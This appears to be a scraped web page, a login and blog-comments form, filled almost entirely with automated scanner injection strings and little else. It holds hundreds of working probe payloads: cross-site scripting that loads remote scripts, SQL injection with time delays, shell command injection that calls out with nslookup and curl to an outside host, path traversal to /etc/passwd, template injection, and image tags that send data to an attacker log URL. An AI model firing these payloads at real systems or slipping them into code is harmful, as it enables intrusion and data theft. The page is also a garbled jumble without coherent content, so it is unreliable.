postfix admin

Login Form



My Resource

Blog Comments





555

1CPl7vlYO

555

555

555<esi:include src="http://bxss.me/rpb.png"/>

../../../../../../../../../../../../../../etc/passwd

QxQtPadk

echo haieoo$()\ qymoop\nz^xyu||a #' &echo haieoo$()\ qymoop\nz^xyu||a #|" &echo haieoo$()\ qymoop\nz^xyu||a #

response.write(9849786*9579246)

'+response.write(9849786*9579246)+'

&echo ojcjet$()\ ddzmkf\nz^xyu||a #' &echo ojcjet$()\ ddzmkf\nz^xyu||a #|" &echo ojcjet$()\ ddzmkf\nz^xyu||a #

555

../../../../../../../../../../../../../../windows/win.ini

555

555

file:///etc/passwd

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

${9999226+9999095}

555&echo fpdkrw$()\ wgyfbi\nz^xyu||a #' &echo fpdkrw$()\ wgyfbi\nz^xyu||a #|" &echo fpdkrw$()\ wgyfbi\nz^xyu||a #

"+response.write(9849786*9579246)+"

-1 OR 2+691-691-1=0+0+0+1 --

555

)

../555

-1 OR 3+691-691-1=0+0+0+1 --

555

|echo vpmwdz$()\ kmfjoy\nz^xyu||a #' |echo vpmwdz$()\ kmfjoy\nz^xyu||a #|" |echo vpmwdz$()\ kmfjoy\nz^xyu||a #

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555&n923091=v953540

555

HttP://bxss.me/t/xss.html?%00

555

Http://bxss.me/t/fit.txt

'.gethostbyname(lc('hitbr'.'mkeysedpedcf1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(89).chr(101).chr(76).'

555|echo fqbhma$()\ hjpudd\nz^xyu||a #' |echo fqbhma$()\ hjpudd\nz^xyu||a #|" |echo fqbhma$()\ hjpudd\nz^xyu||a #

555

-1 OR 3*2<(0+5+691-691) --

./555

!(()&&!|*|*|

(nslookup -q=cname hitqgvhuzdrqe921dc.bxss.me||curl hitqgvhuzdrqe921dc.bxss.me))

$(nslookup -q=cname hitkwbjlmzkby583c7.bxss.me||curl hitkwbjlmzkby583c7.bxss.me)

^(#$!@#$)(()))******

555

-1 OR 3*2>(0+5+691-691) --

555

555

".gethostbyname(lc("hitzo"."rpohwdkg4f0b9.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(66).chr(99).chr(79)."

http://bxss.me/t/fit.txt?.jpg

comments

'

bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(105).concat(87).concat(115).concat(87)+(require"socket" Socket.gethostbyname("hitjk"+"yikpujjk16b17.bxss.me.")[3].to_s)+"

'+'A'.concat(70-3).concat(22*4).concat(106).concat(79).concat(97).concat(66)+(require'socket' Socket.gethostbyname('hitgs'+'buwhqtqi7f5a2.bxss.me.')[3].to_s)+'

555

xfs.bxss.me

"

comments

/etc/shells

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1 OR 2+836-836-1=0+0+0+1

555

555

&nslookup -q=cname hitjdxarfvhjx97009.bxss.me&'\"`0&nslookup -q=cname hitjdxarfvhjx97009.bxss.me&`'

&(nslookup -q=cname hitjkeigecvsdc84e0.bxss.me||curl hitjkeigecvsdc84e0.bxss.me)&'\"`0&(nslookup -q=cname hitjkeigecvsdc84e0.bxss.me||curl hitjkeigecvsdc84e0.bxss.me)&`'

555

555

-1 OR 3+836-836-1=0+0+0+1

555

'"()

555

c:/windows/win.ini

comments/.

${@print(md5(31337))}

905743

555

555

555'&&sleep(27*1000)*ldsoma&&'

http://xfs.bxss.me?71.22

555"&&sleep(27*1000)*iflozh&&"

555

${@print(md5(31337))}\

555

bxss.me

555'"()&%<zzz><ScRiPt >AAXu(9610)</ScRiPt>

'"

-1 OR 3*2<(0+5+836-836)

555

555

|(nslookup -q=cname hitbbclwhrgdc0596b.bxss.me||curl hitbbclwhrgdc0596b.bxss.me)

xfs.bxss.me?71.22

//xfs.bxss.me?71.22

`(nslookup -q=cname hitljmswggnod8464b.bxss.me||curl hitljmswggnod8464b.bxss.me)`

555

-1 OR 3*2>(0+5+836-836)

<!--

'"()&%<zzz><ScRiPt >AAXu(9680)</ScRiPt>

555

555

'.print(md5(31337)).'

555'||sleep(27*1000)*xfsven||'

555"||sleep(27*1000)*gxmdee||"

555

555

555

5559323546

555

-1' OR 2+277-277-1=0+0+0+1 --

555

/\xfs.bxss.me?71.22

555

555

-1' OR 3+277-277-1=0+0+0+1 --

555

bfg7984\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7984

555

555

555

555

555

555

bfgx3052\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3052

-1' OR 3*2<(0+5+277-277) --

555

555

-1' OR 3*2>(0+5+277-277) --

<%={{={@{#{${dfb}}%>

555

555

555

555

555

555

555

-1' OR 2+559-559-1=0+0+0+1 or '011cWGpe'='

555

555

555

555

<th:t="${dfb}#foreach

-1' OR 3+559-559-1=0+0+0+1 or '011cWGpe'='

555

555

-1" OR 2+761-761-1=0+0+0+1 --

555

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

-1" OR 3+761-761-1=0+0+0+1 --

555

555

555

dfb{{98991*97996}}xca

555

555

555

555

555

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >AAXu(9975)</ScRiPt>

555<W27KCC>3RUWF[!+!]</W27KCC>

555<script>AAXu(9796)</script>

555*if(now()=sysdate(),sleep(15),0)

555<script>AAXu(9504)</script>9504

555<ScR<ScRiPt>IpT>AAXu(9262)</sCr<ScRiPt>IpT>

555<ScRiPt >AAXu(9954)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9692></ScRiPt>

555<ScRiPt >AAXu(9551)</ScRiPt>

555<svg \xa0onload=AAXu(9594)

555<isindex type=image src=1 onerror=AAXu(9193)>

555<iframe src='data:text/html

555<body onload=AAXu(9683)>

555<img src=//xss.bxss.me/t/dot.gif onload=AAXu(9802)>

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

555<img src=xyz OnErRor=AAXu(9201)>

555<img/src=">" onerror=alert(9033)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%41%41%58%75%289980%29%3C%2F%73%43%72%69%70%54%3E

555\u003CScRiPt\AAXu(9055)\u003C/sCripT\u003E

555&lt

\xf6<img zzz onmouseover=AAXu(92521) //\xf6>

555<input autofocus onfocus=AAXu(9532)>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(AAXu(9059))}

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

555UkdUR <ScRiPt >AAXu(9225)</ScRiPt>

555<WI3MMP>M3TKD[!+!]</WI3MMP>

555<ifRAme sRc=9392.com></IfRamE>

555<ac2Ru0K x=9931>

555<img sRc='http://attacker-9980/log.php?

555<ae3azhT<

555

555

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555-1

555-1)

555-1 waitfor delay '0:0:15' --

555'"()&%<zzz><ScRiPt >fci8(9150)</ScRiPt>

555'"()&%<zzz><ScRiPt >oiQ2(9117)</ScRiPt>

'"()&%<zzz><ScRiPt >fci8(9003)</ScRiPt>

'"()&%<zzz><ScRiPt >oiQ2(9016)</ScRiPt>

5559513575

5559650322

555KY0Er1bs'

bfg1907\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1907

bfg8977\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8977

bfgx9459\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9459

bfgx9434\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9434

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555-1 OR 70=(SELECT 70 FROM PG_SLEEP(15))--

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >T1xh(9995)</ScRiPt>

555-1) OR 964=(SELECT 964 FROM PG_SLEEP(15))--

'"()&%<zzz><ScRiPt >T1xh(9611)</ScRiPt>

dfb{{98991*97996}}xca

555

5559657744

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

bfg3513\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3513

bfgx8296\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8296

555-1)) OR 533=(SELECT 533 FROM PG_SLEEP(15))--

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

dfb__${98991*97996}__::.x

555'"()&%<zzz><ScRiPt >GdIt(9739)</ScRiPt>

<th:t="${dfb}#foreach

555<ScRiPt >fci8(9118)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'"()&%<zzz><ScRiPt >GdIt(9316)</ScRiPt>

555FGuzYmGU' OR 211=(SELECT 211 FROM PG_SLEEP(15))--

555<ScRiPt >oiQ2(9441)</ScRiPt>

5559721172

555<WQ1QAI>ZUXAM[!+!]</WQ1QAI>

555

bfg10972\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10972

555<WS7ZF9>MQWT3[!+!]</WS7ZF9>

555OILD0bcB') OR 118=(SELECT 118 FROM PG_SLEEP(15))--

555<script>fci8(9001)</script>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<script>fci8(9710)</script>9710

555<script>oiQ2(9279)</script>

bfgx8436\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8436

555<ScR<ScRiPt>IpT>fci8(9784)</sCr<ScRiPt>IpT>

<%={{={@{#{${dfb}}%>

555<script>oiQ2(9890)</script>9890

dfb[[${98991*97996}]]xca

555e1sLT5zf')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--

555

555'"()&%<zzz><ScRiPt >NVnD(9713)</ScRiPt>

555<ScRiPt >fci8(9660)</ScRiPt>

555

555<ScR<ScRiPt>IpT>oiQ2(9056)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >NVnD(9702)</ScRiPt>

XfowHJJZ

dfb__${98991*97996}__::.x

echo tflaea$()\ mezoek\nz^xyu||a #' &echo tflaea$()\ mezoek\nz^xyu||a #|" &echo tflaea$()\ mezoek\nz^xyu||a #

1ls30itSO

response.write(9543927*9212648)

5559609967

555

555<ScRiPt >oiQ2(9039)</ScRiPt>

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9638></ScRiPt>

555

&echo avincq$()\ xclpzq\nz^xyu||a #' &echo avincq$()\ xclpzq\nz^xyu||a #|" &echo avincq$()\ xclpzq\nz^xyu||a #

'+response.write(9543927*9212648)+'

../../../../../../../../../../../../../../etc/passwd

555&echo omoqzn$()\ sdeige\nz^xyu||a #' &echo omoqzn$()\ sdeige\nz^xyu||a #|" &echo omoqzn$()\ sdeige\nz^xyu||a #

|echo bozjwn$()\ jlsmdm\nz^xyu||a #' |echo bozjwn$()\ jlsmdm\nz^xyu||a #|" |echo bozjwn$()\ jlsmdm\nz^xyu||a #

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9455></ScRiPt>

../../../../../../../../../../../../../../windows/win.ini

bfg8476\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8476

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<esi:include src="http://bxss.me/rpb.png"/>

${9999946+10000406}

"+response.write(9543927*9212648)+"

555|echo qjvsrw$()\ haycio\nz^xyu||a #' |echo qjvsrw$()\ haycio\nz^xyu||a #|" |echo qjvsrw$()\ haycio\nz^xyu||a #

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555<ScRiPt >fci8(9786)</ScRiPt>

(nslookup -q=cname hitgxscpyvpqn66a67.bxss.me||curl hitgxscpyvpqn66a67.bxss.me))

555

555

12345'"\'\")

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

file:///etc/passwd

555

bfgx10397\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10397

Http://bxss.me/t/fit.txt

555<ScRiPt >oiQ2(9481)</ScRiPt>

dfb{98991*97996}xca

555<svg \xa0onload=fci8(9857)

555&n905308=v950159

555

555

555<ScRiPt >T1xh(9722)</ScRiPt>

555

555

$(nslookup -q=cname hitgufdereleqb3a83.bxss.me||curl hitgufdereleqb3a83.bxss.me)

http://bxss.me/t/fit.txt?.jpg

555

../555

555

'.gethostbyname(lc('hitwb'.'uodnnoihef1f8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(85).chr(97).chr(90).'

dfb${98991*97996}xca

555

)

<%={{={@{#{${dfb}}%>

555<svg \xa0onload=oiQ2(9915)

&nslookup -q=cname hitvhephpdeif0eb01.bxss.me&'\"`0&nslookup -q=cname hitvhephpdeif0eb01.bxss.me&`'

/etc/shells

555

'

".gethostbyname(lc("hitbm"."mbvggmbvfd28c.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(81).chr(111).chr(85)."

555

555<WPT0IW>WFPTY[!+!]</WPT0IW>

555<isindex type=image src=1 onerror=fci8(9938)>

<th:t="${dfb}#foreach

555

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

"

555

!(()&&!|*|*|

&(nslookup -q=cname hitmgmglpkbeuc35ee.bxss.me||curl hitmgmglpkbeuc35ee.bxss.me)&'\"`0&(nslookup -q=cname hitmgmglpkbeuc35ee.bxss.me||curl hitmgmglpkbeuc35ee.bxss.me)&`'

c:/windows/win.ini

555

555

dfb#{98991*97996}xca

z3MU0OWh

${@print(md5(31337))}

${@print(md5(31337))}\

555<iframe src='data:text/html

555

bxss.me

^(#$!@#$)(()))******

555<isindex type=image src=1 onerror=oiQ2(9652)>

555

|(nslookup -q=cname hitcpwomnogdj88750.bxss.me||curl hitcpwomnogdj88750.bxss.me)

555

555<script>T1xh(9272)</script>

555

'.print(md5(31337)).'

HttP://bxss.me/t/xss.html?%00

555

555

555<iframe src='data:text/html

bxss.me/t/xss.html?%00

555

'"()

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(79).concat(117).concat(68)+(require"socket" Socket.gethostbyname("hitqj"+"hefwfbpi28d73.bxss.me.")[3].to_s)+"

`(nslookup -q=cname hitbjriprqtyj785b3.bxss.me||curl hitbjriprqtyj785b3.bxss.me)`

555

dfb{#98991*97996}xca

555

555

555

555'&&sleep(27*1000)*xclnyl&&'

555

555

555

555

555<body onload=fci8(9813)>

'+'A'.concat(70-3).concat(22*4).concat(118).concat(82).concat(111).concat(76)+(require'socket' Socket.gethostbyname('hitnx'+'hdhxqafz4527f.bxss.me.')[3].to_s)+'

555

555<script>T1xh(9574)</script>9574

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555"&&sleep(27*1000)*qouauo&&"

comments

555

dfb{@98991*97996}xca

555

555

555

555<body onload=oiQ2(9852)>

555'||sleep(27*1000)*rqimel||'

comments

555

555

555<img src=//xss.bxss.me/t/dot.gif onload=fci8(9953)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

555<ScR<ScRiPt>IpT>T1xh(9160)</sCr<ScRiPt>IpT>

555

555

555

555"||sleep(27*1000)*mvswmx||"

comments/.

555

dfb{{=98991*97996}}xca

555

555<img src=//xss.bxss.me/t/dot.gif onload=oiQ2(9638)>

555

xfs.bxss.me

'"

555<img src=xyz OnErRor=fci8(9696)>

555

555

555

555

555

555

555<ScRiPt >T1xh(9046)</ScRiPt>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=oiQ2(9201)>

555

555

555

dfb@(98991*97996)xca

<!--

555'"()&%<zzz><ScRiPt >jJE5(9241)</ScRiPt>

555fTTjNozw

555

555

555

dfb[[${98991*97996}]]xca

555

555<img/src=">" onerror=alert(9476)>

555

'"()&%<zzz><ScRiPt >jJE5(9953)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9418></ScRiPt>

555<img/src=">" onerror=alert(9570)>

555

dfb<%=98991*97996%>xca

555

555

5559355406

555<ScRiPt >T1xh(9680)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%69%51%32%289860%29%3C%2F%73%43%72%69%70%54%3E

555

555

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%66%63%69%38%289944%29%3C%2F%73%43%72%69%70%54%3E

dfb__${98991*97996}__::.x

555

555<svg \xa0onload=T1xh(9775)

dfb#set($x=98991*97996)${x}xca

555

555

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555

555

555

555\u003CScRiPt\fci8(9574)\u003C/sCripT\u003E

555<isindex type=image src=1 onerror=T1xh(9032)>

555\u003CScRiPt\oiQ2(9048)\u003C/sCripT\u003E

dfb{{"abc"|title}}xca

555

555

555'"()&%<zzz><ScRiPt >oBY9(9109)</ScRiPt>

555<ScRiPt >NVnD(9966)</ScRiPt>

-1 OR 2+631-631-1=0+0+0+1 --

555

555

555'"()&%<zzz><ScRiPt >RyJ5(9377)</ScRiPt>

555&lt

555&lt

555<iframe src='data:text/html

-1 OR 2+628-628-1=0+0+0+1

print("dfb" . 98991*97996 . "xca")

'"()&%<zzz><ScRiPt >oBY9(9398)</ScRiPt>

555<WTDIEQ>RDJLL[!+!]</WTDIEQ>

-1' OR 2+160-160-1=0+0+0+1 --

555<body onload=T1xh(9284)>

98991*97996*98991*97996

-1' OR 2+381-381-1=0+0+0+1 or '8LpbXELc'='

\xf6<img zzz onmouseover=fci8(93411) //\xf6>

\xf6<img zzz onmouseover=oiQ2(94321) //\xf6>

'"()&%<zzz><ScRiPt >RyJ5(9815)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=T1xh(9768)>

555<input autofocus onfocus=fci8(9692)>

dfb{@math key=98991 method="multiply" operand=97996/}xca

555<script>NVnD(9849)</script>

-1" OR 2+115-115-1=0+0+0+1 --

5559396815

555'"()&%<zzz><ScRiPt >ufLz(9434)</ScRiPt>

555'"()&%<zzz><ScRiPt >N5bQ(9887)</ScRiPt>

5559193328

555<img src=xyz OnErRor=T1xh(9393)>

555<input autofocus onfocus=oiQ2(9075)>

555

<a HrEF=http://xss.bxss.me></a>

dfb{{{this}}}xca

555<script>NVnD(9642)</script>9642

bfg3044\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3044

555'"()&%<zzz><ScRiPt >hAH8(9951)</ScRiPt>

555'"()&%<zzz><ScRiPt >s2NI(9931)</ScRiPt>

'"()&%<zzz><ScRiPt >ufLz(9836)</ScRiPt>

'"()&%<zzz><ScRiPt >N5bQ(9001)</ScRiPt>

bfg2135\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2135

555

555<img/src=">" onerror=alert(9985)>

<a HrEF=http://xss.bxss.me></a>

5559476434

'"()&%<zzz><ScRiPt >hAH8(9203)</ScRiPt>

5559667703

'"()&%<zzz><ScRiPt >s2NI(9921)</ScRiPt>

bfgx1880\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1880

<a HrEF=jaVaScRiPT:>

555

555<ScR<ScRiPt>IpT>NVnD(9008)</sCr<ScRiPt>IpT>

#{98991*97996*98991*97996}

bfgx1995\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1995

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%31%78%68%289391%29%3C%2F%73%43%72%69%70%54%3E

555

bfg4215\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4215

555*if(now()=sysdate(),sleep(15),0)

<a HrEF=jaVaScRiPT:>

5559018604

dfb#{xca}=123

555

bfg6832\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6832

<%={{={@{#{${dfb}}%>

5559263378

555}body{zzz:Expre/**/SSion(fci8(9838))}

555<ScRiPt >NVnD(9744)</ScRiPt>

<%={{={@{#{${dfb}}%>

555

dfb{{'abcd'.toUpperCase()}}xca

bfg5767\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5767

bfgx3226\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3226

555

555\u003CScRiPt\T1xh(9212)\u003C/sCripT\u003E

555}body{zzz:Expre/**/SSion(oiQ2(9947))}

555

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9753></ScRiPt>

bfgx10309\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10309

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

bfgx8603\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8603

555cjHIW <ScRiPt >fci8(9703)</ScRiPt>

bfg7952\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7952

555

<th:t="${dfb}#foreach

555VdVt7 <ScRiPt >oiQ2(9372)</ScRiPt>

555&lt

<%={{={@{#{${dfb}}%>

555

dfb{{98991*97996}}xca

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<ScRiPt >NVnD(9447)</ScRiPt>

<th:t="${dfb}#foreach

555<WKTMOF>ZFUCR[!+!]</WKTMOF>

555<WJXATM>DSEZA[!+!]</WJXATM>

bfgx9323\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9323

555

555

dfb[[${98991*97996}]]xca

\xf6<img zzz onmouseover=T1xh(94271) //\xf6>

<th:t="${dfb}#foreach

555

555<ifRAme sRc=9535.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

555<svg \xa0onload=NVnD(9076)

dfb__${98991*97996}__::.x

555<ifRAme sRc=9764.com></IfRamE>

<th:t="${dfb}#foreach

555

555

555<aA1aPb7 x=9179>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<isindex type=image src=1 onerror=NVnD(9765)>

555<input autofocus onfocus=T1xh(9185)>

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<aarn3vA x=9179>

555<img sRc='http://attacker-9920/log.php?

555

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

555

<a HrEF=http://xss.bxss.me></a>

555<iframe src='data:text/html

555<aLPhAOb<

555

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9816/log.php?

555<ScRiPt >GdIt(9279)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555<body onload=NVnD(9606)>

555

dfb__${98991*97996}__::.x

555<a5SHAXn<

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WC8SSD>WD8QF[!+!]</WC8SSD>

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=//xss.bxss.me/t/dot.gif onload=NVnD(9344)>

555}body{zzz:Expre/**/SSion(T1xh(9923))}

555

dfb{{98991*97996}}xca

555<script>GdIt(9393)</script>

dfb__${98991*97996}__::.x

555

dfb${98991*97996}xca

555<ScRiPt >oBY9(9555)</ScRiPt>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=xyz OnErRor=NVnD(9905)>

555MLuMY <ScRiPt >T1xh(9781)</ScRiPt>

555<script>GdIt(9348)</script>9348

555<WKQ0CN>XBPAH[!+!]</WKQ0CN>

dfb#{98991*97996}xca

dfb[[${98991*97996}]]xca

555-1

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<img/src=">" onerror=alert(9871)>

555<WZKSYO>RCK5B[!+!]</WZKSYO>

555<ScRiPt >RyJ5(9365)</ScRiPt>

555<ScR<ScRiPt>IpT>GdIt(9606)</sCr<ScRiPt>IpT>

555<script>oBY9(9637)</script>

dfb[[${98991*97996}]]xca

dfb{#98991*97996}xca

555<ifRAme sRc=9299.com></IfRamE>

555<WPDIKW>IRWCX[!+!]</WPDIKW>

555<ScRiPt >GdIt(9400)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

%35%35%35%3C%53%63%52%69%50%74%20%3E%4E%56%6E%44%289712%29%3C%2F%73%43%72%69%70%54%3E

555<script>oBY9(9066)</script>9066

dfb__${98991*97996}__::.x

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9409></ScRiPt>

555<script>RyJ5(9401)</script>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\u003CScRiPt\NVnD(9262)\u003C/sCripT\u003E

dfb{@98991*97996}xca

555<aT5vVsM x=9101>

555<ScRiPt >GdIt(9873)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555-1)

555<ScR<ScRiPt>IpT>oBY9(9023)</sCr<ScRiPt>IpT>

555<ScRiPt >ufLz(9037)</ScRiPt>

555<script>RyJ5(9626)</script>9626

555<ScRiPt >N5bQ(9262)</ScRiPt>

555<WOVMOU>PCC8I[!+!]</WOVMOU>

555<ScRiPt >oBY9(9328)</ScRiPt>

555<svg \xa0onload=GdIt(9949)

555<img sRc='http://attacker-9699/log.php?

555&lt

555<ScRiPt >s2NI(9344)</ScRiPt>

dfb{{=98991*97996}}xca

555<WX6V5M>JOMMG[!+!]</WX6V5M>

555'"()&%<zzz><ScRiPt >mjoN(9873)</ScRiPt>

555'"()&%<zzz><ScRiPt >30s3(9746)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9587></ScRiPt>

dfb@(98991*97996)xca

555<script>ufLz(9003)</script>

555-1 waitfor delay '0:0:15' --

555<isindex type=image src=1 onerror=GdIt(9092)>

555<aBhTzEy<

\xf6<img zzz onmouseover=NVnD(95781) //\xf6>

555<W2GRT6>N3K5B[!+!]</W2GRT6>

555<ScR<ScRiPt>IpT>RyJ5(9461)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >30s3(9291)</ScRiPt>

'"()&%<zzz><ScRiPt >mjoN(9402)</ScRiPt>

dfb<%=98991*97996%>xca

555<script>N5bQ(9590)</script>

555<ScRiPt >oBY9(9407)</ScRiPt>

555<script>ufLz(9666)</script>9666

5559587601

555<iframe src='data:text/html

555<input autofocus onfocus=NVnD(9997)>

555<script>s2NI(9530)</script>

555<ScRiPt >RyJ5(9002)</ScRiPt>

5559606643

555<script>N5bQ(9139)</script>9139

555<ScR<ScRiPt>IpT>ufLz(9393)</sCr<ScRiPt>IpT>

dfb#set($x=98991*97996)${x}xca

555<svg \xa0onload=oBY9(9172)

bfg5171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5171

bfg3726\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3726

555<body onload=GdIt(9778)>

<a HrEF=http://xss.bxss.me></a>

555<script>s2NI(9257)</script>9257

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9600></ScRiPt>

555<ScR<ScRiPt>IpT>N5bQ(9078)</sCr<ScRiPt>IpT>

555<isindex type=image src=1 onerror=oBY9(9137)>

555<ScRiPt >RyJ5(9362)</ScRiPt>

555Zhx6bBZw'

555<ScRiPt >ufLz(9836)</ScRiPt>

bfgx3318\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3318

bfgx8749\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8749

dfb{{"abc"|title}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=GdIt(9013)>

555<ScR<ScRiPt>IpT>s2NI(9984)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >N5bQ(9096)</ScRiPt>

555<iframe src='data:text/html

555<svg \xa0onload=RyJ5(9325)

555'"()&%<zzz><ScRiPt >9PjQ(9732)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9442></ScRiPt>

print("dfb" . 98991*97996 . "xca")

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(NVnD(9265))}

555<ScRiPt >s2NI(9924)</ScRiPt>

555<img src=xyz OnErRor=GdIt(9203)>

<%={{={@{#{${dfb}}%>

555<body onload=oBY9(9673)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9906></ScRiPt>

555<isindex type=image src=1 onerror=RyJ5(9868)>

555<ScRiPt >ufLz(9401)</ScRiPt>

'"()&%<zzz><ScRiPt >9PjQ(9595)</ScRiPt>

555

555'"()&%<zzz><ScRiPt >DaC0(9760)</ScRiPt>

98991*97996*98991*97996

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9046></ScRiPt>

